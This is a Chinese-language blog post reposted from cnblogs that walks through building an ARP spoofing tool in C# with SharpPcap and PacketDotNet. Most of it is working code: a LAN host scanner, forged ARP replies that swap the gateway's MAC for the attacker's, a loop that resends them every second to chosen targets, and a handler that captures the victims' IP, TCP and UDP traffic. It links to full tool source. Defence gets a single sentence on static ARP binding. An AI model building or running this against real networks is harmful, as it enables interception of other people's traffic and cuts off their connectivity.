由于之前寫的C# 實(shí)現(xiàn)Arp欺詐的文章屬于網(wǎng)絡(luò)攻擊,不能夠被展示,所以這邊我們稍微說一下C#調(diào)用ARP包以及查看其他電腦上網(wǎng)數(shù)據(jù)包的技術(shù),委婉的說一下ARP在局域網(wǎng)之中的應(yīng)用。
本文章純屬技術(shù)討論,并且涵蓋了如何去防止ARP攻擊的手段。
ARP作用
學(xué)到一點(diǎn)網(wǎng)絡(luò)的都知道,ARP本身用于IP地址和MAC地址的轉(zhuǎn)換,主要是在七層網(wǎng)絡(luò)協(xié)議中,網(wǎng)絡(luò)層之下就是使用MAC地址進(jìn)行通信了,這樣的設(shè)計(jì)本身也是底層可以無關(guān)上層通訊協(xié)議的變化而變化,而提供一個(gè)統(tǒng)一的接口。
比如局域網(wǎng)中的A主機(jī)和B主機(jī),如果A主機(jī)的ARP緩存中有B主機(jī)的MAC地址,則直接發(fā)送數(shù)據(jù)到對(duì)應(yīng)MAC地址,沒有則通過發(fā)送ARP廣播數(shù)據(jù)包的方式,根據(jù)回應(yīng)來更新ARP緩存。
ARP欺騙原理
創(chuàng)建一個(gè)arp包,將網(wǎng)關(guān)ip地址和錯(cuò)誤的網(wǎng)關(guān)mac地址發(fā)送給目標(biāo)主機(jī),讓主機(jī)更新錯(cuò)誤的mac-ip地址映射到緩存中。
工具
開源的.net arp庫(kù): SharpPcap,PacketDotNet
項(xiàng)目中導(dǎo)入:
<PackageReference Include="PacketDotNet" Version="1.4.7" />
<PackageReference Include="SharpPcap" Version="6.2.5" />
實(shí)戰(zhàn)
獲取本機(jī)所有的網(wǎng)絡(luò)設(shè)備
LibPcapLiveDeviceList.Instance
獲取對(duì)應(yīng)設(shè)備的ip和mac地址,以及網(wǎng)關(guān)ip
foreach (var address in LibPcapLiveDevice.Addresses)
{
if (address.Addr.type == Sockaddr.AddressTypes.AF_INET_AF_INET6)
{
//ipv4地址
if (address.Addr.ipAddress.AddressFamily == AddressFamily.InterNetwork)
{
LocalIp = address.Addr.ipAddress;
break;
}
}
}
foreach (var address in LibPcapLiveDevice.Addresses)
{
if (address.Addr.type == Sockaddr.AddressTypes.HARDWARE)
{
LocalMac = address.Addr.hardwareAddress; // 本機(jī)MAC
}
}
var gw = LibPcapLiveDevice.Interface.GatewayAddresses; // 網(wǎng)關(guān)IP
//ipv4的gateway
GatewayIp = gw?.FirstOrDefault(x => x.AddressFamily == AddressFamily.InterNetwork);
獲取網(wǎng)關(guān)mac地址
通過發(fā)送arp包到網(wǎng)關(guān),獲取響應(yīng)包,從響應(yīng)包中獲取mac地址。
1.創(chuàng)建arp包
var ethernetPacket = new EthernetPacket(localMac, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetType.Arp);
var arpPacket = new ArpPacket(ArpOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), destinationIP, localMac, localIP);
ethernetPacket.PayloadPacket = arpPacket;
2.發(fā)送arp包到網(wǎng)關(guān),并且等待下一個(gè)回復(fù)包。
LibPcapLiveDevice.Open(DeviceModes.Promiscuous, 20);
LibPcapLiveDevice.Filter = arpFilter;
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = TimeSpan.FromMilliseconds(200);
ArpPacket arpPacket = null;
var timeoutDateTime = DateTime.Now + _timeout;
while (DateTime.Now < timeoutDateTime)
{
if (requestInterval < (DateTime.Now - lastRequestTime))
{
LibPcapLiveDevice.SendPacket(request);
lastRequestTime = DateTime.Now;
}
if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
{
if (packet.Device.LinkType != LinkLayers.Ethernet)
{
continue;
}
var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
arpPacket = pack.Extract<ArpPacket>();
if (arpPacket == null)//是否是一個(gè)arp包
{
continue;
}
if (arpPacket.SenderProtocolAddress.Equals(destIP))
{
break;
}
}
}
// free the device
LibPcapLiveDevice.Close();
return arpPacket?.SenderHardwareAddress;
掃描局域網(wǎng)內(nèi)活動(dòng)ip和mac地址
1.設(shè)置掃描的ip區(qū)間,生成每個(gè)ip的arp請(qǐng)求包
var arpPackets = new Packet[targetIPList.Count];
for (int i = 0; i < arpPackets.Length; ++i)
{
arpPackets[i] = BuildRequest(targetIPList[i], LocalMac, LocalIp);
}
2.發(fā)送arp包到各個(gè)ip,如果回復(fù)了則在線,超時(shí)則認(rèn)為不活動(dòng)
if (_cancellationTokenSource.IsCancellationRequested)
{
break;
}
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = TimeSpan.FromMilliseconds(200);
var timeoutDateTime = DateTime.Now + _timeout;
while (DateTime.Now < timeoutDateTime)
{
if (_cancellationTokenSource.IsCancellationRequested)
{
break;
}
if (requestInterval < (DateTime.Now - lastRequestTime))
{
LibPcapLiveDevice.SendPacket(arpPackets[i]);
lastRequestTime = DateTime.Now;
}
if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
{
if (packet.Device.LinkType != LinkLayers.Ethernet)
{
continue;
}
var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
var arpPacket = pack.Extract<ArpPacket>();
if (arpPacket == null)
{
continue;
}
//回復(fù)的arp包并且是我們請(qǐng)求的ip地址
if (arpPacket.SenderProtocolAddress.Equals(targetIPList[i]))
{
Application.Current.Dispatcher.Invoke(() =>
{
///增加到IPlist中
Computers.Add(new Computer()
{
IPAddress = arpPacket.SenderProtocolAddress.ToString(),
MacAddress = arpPacket.SenderHardwareAddress?.ToString(),
});
});
break;
}
}
}
指定ip/ips攻擊
攻擊包就不能創(chuàng)建請(qǐng)求包, 應(yīng)該偽造一個(gè)來自網(wǎng)關(guān)的響應(yīng)包,從而將網(wǎng)關(guān)錯(cuò)誤的mac地址更新到目標(biāo)主機(jī)的緩存中。
1.創(chuàng)建錯(cuò)誤的響應(yīng)包
private Packet BuildResponse(IPAddress destIP, PhysicalAddress destMac, IPAddress senderIP, PhysicalAddress senderMac)
{
var ethernetPacket = new EthernetPacket(senderMac, destMac, EthernetType.Arp);
var arpPacket = new ArpPacket(ArpOperation.Response, destMac, destIP, senderMac, senderIP);
ethernetPacket.PayloadPacket = arpPacket;
return ethernetPacket;
}
調(diào)用創(chuàng)建arp響應(yīng)包,但是可以看到最后一個(gè)mac地址,應(yīng)該是網(wǎng)關(guān)的mac地址,我們替換成了自己本地mac地址。
BuildResponse(IPAddress.Parse(compute.IPAddress), PhysicalAddress.Parse(compute.MacAddress), GatewayIp, LocalMac);
2.直接以1000ms的間隔輪詢發(fā)送響應(yīng)包到目標(biāo)主機(jī)
var aTask = Task.Run(async () =>
{
while (true)
{
if (_cancellationTokenSource1.IsCancellationRequested)
{
break;
}
try
{
LibPcapLiveDevice.SendPacket(packet);
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
await Task.Delay(1000);
}
LibPcapLiveDevice.Close();
}, _cancellationTokenSource1.Token);
獲取網(wǎng)絡(luò)數(shù)據(jù)包
此時(shí)的被攻擊的電腦,由于它的網(wǎng)關(guān)對(duì)應(yīng)的MAC地址被我們替換成了自己電腦的MAC,所以原本通過網(wǎng)關(guān)發(fā)送的數(shù)據(jù)包,都會(huì)發(fā)送到我們電腦上來,我們不做任何處理就會(huì)導(dǎo)致電腦無法上網(wǎng),我們可以通過監(jiān)聽網(wǎng)卡查看來自該電腦的數(shù)據(jù)包,從而窺探一些請(qǐng)求。
/// <summary>
/// 監(jiān)聽到攻擊的網(wǎng)卡收到的數(shù)據(jù)包
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void OnPacketArrival(object sender, PacketCapture e)
{
try
{
var device = sender as LibPcapLiveDevice;
var packet = Packet.ParsePacket(e.Device.LinkType, e.Data.ToArray());
if (packet != null)
{
if (packet is EthernetPacket ethernetPacket) //數(shù)據(jù)包是以太網(wǎng)數(shù)據(jù)
{
var targetComputer = ArpAttackComputers.FirstOrDefault(x => x.MacAddress == ethernetPacket.SourceHardwareAddress.ToString());
if (targetComputer != null)
{
var ipPacket = ethernetPacket.Extract<IPPacket>();
if (ipPacket != null)
{
var packetViewModel = new PacketViewModel();
packetViewModel.SourceIpAddress = ipPacket.SourceAddress.ToString();
packetViewModel.TargetIpAddress = ipPacket.DestinationAddress.ToString();
var udpPacket = ipPacket.Extract<UdpPacket>();
var tcpPacket = ipPacket.Extract<TcpPacket>();
packetViewModel.Type = "IP";
if (udpPacket != null)
{
packetViewModel.SourcePort = udpPacket.SourcePort;
packetViewModel.TargetPort = udpPacket.DestinationPort;
packetViewModel.Type = "UDP";
}
if (tcpPacket != null)
{
packetViewModel.SourcePort = tcpPacket.SourcePort;
packetViewModel.TargetPort = tcpPacket.DestinationPort;
packetViewModel.Type = "TCP";
}
targetComputer.AddPacket(packetViewModel);
}
else
{
///mac地址沒啥好記錄的都知道了
var packetViewModel = new PacketViewModel();
packetViewModel.Type = "以太網(wǎng)";
targetComputer.AddPacket(packetViewModel);
}
}
}
}
}
catch (Exception)
{
}
}
我們解析了IP數(shù)據(jù)包,TCP以及UDP包。
工具頁面
如何預(yù)防?
一般只需要本地將網(wǎng)關(guān)和MAC地址靜態(tài)綁定即可。
完整代碼和工具
https://github.com/BruceQiu1996/ArpSpoofing
作者qwqwQAQ 轉(zhuǎn)自https://www.cnblogs.com/qwqwQAQ/p/18118712
該文章在 2024/4/8 11:51:26 編輯過